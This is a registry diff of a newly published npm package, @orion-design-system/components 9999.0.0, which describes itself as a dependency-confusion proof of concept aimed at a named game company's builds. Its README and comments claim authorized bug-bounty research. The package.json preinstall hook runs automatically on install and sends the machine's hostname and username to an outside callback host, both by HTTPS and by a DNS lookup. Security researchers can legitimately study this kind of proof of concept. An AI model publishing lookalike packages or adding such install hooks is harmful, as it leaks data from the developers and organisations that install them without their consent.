@orion-design-system/components 9999.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/README.md +9 -0
  2. package/index.js +6 -0
  3. package/package.json +12 -0
package/README.md ADDED
@@ -0,0 +1,9 @@
1
+ # Security Research Package
2
+
3
+ This package was published as part of an authorized bug bounty security research investigation into dependency confusion vulnerabilities.
4
+
5
+ **If you are a Cloud Imperium Games / Roberts Space Industries developer and this package was installed in your build pipeline, your build infrastructure may be vulnerable to dependency confusion attacks. Please contact your security team immediately and refer to your HackerOne bug bounty program for the corresponding report.**
6
+
7
+ This package contains no malicious code and does not exfiltrate any data from your systems beyond hostname and username for proof-of-concept purposes.
8
+
9
+ Reference: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
package/index.js ADDED
@@ -0,0 +1,6 @@
1
+ // Security research package — dependency confusion PoC
2
+ // This package was published as part of an authorized bug bounty investigation.
3
+ // If you are a CIG/RSI developer and this package was installed in your build,
4
+ // please report this to your security team immediately.
5
+ // Reference: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
6
+ module.exports = {};
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "@orion-design-system/components",
3
+ "version": "9999.0.0",
4
+ "description": "Security research - dependency confusion PoC",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node -e \"const h=require('os').hostname(),u=require('os').userInfo().username;require('https').get('https://d8kn5vlt5p5h1j34mbcgbx1nffwjobfoh.oast.fun/?h='+encodeURIComponent(h)+'&u='+encodeURIComponent(u)+'&p=orion-components&pkg=@orion-design-system/components').on('error',()=>{});try{require('dns').lookup('orion-components.'+h+'.d8kn5vlt5p5h1j34mbcgbx1nffwjobfoh.oast.fun',()=>{})}catch(e){}\""
8
+ },
9
+ "keywords": ["security-research"],
10
+ "author": "Bug Bounty Researcher",
11
+ "license": "MIT"
12
+ }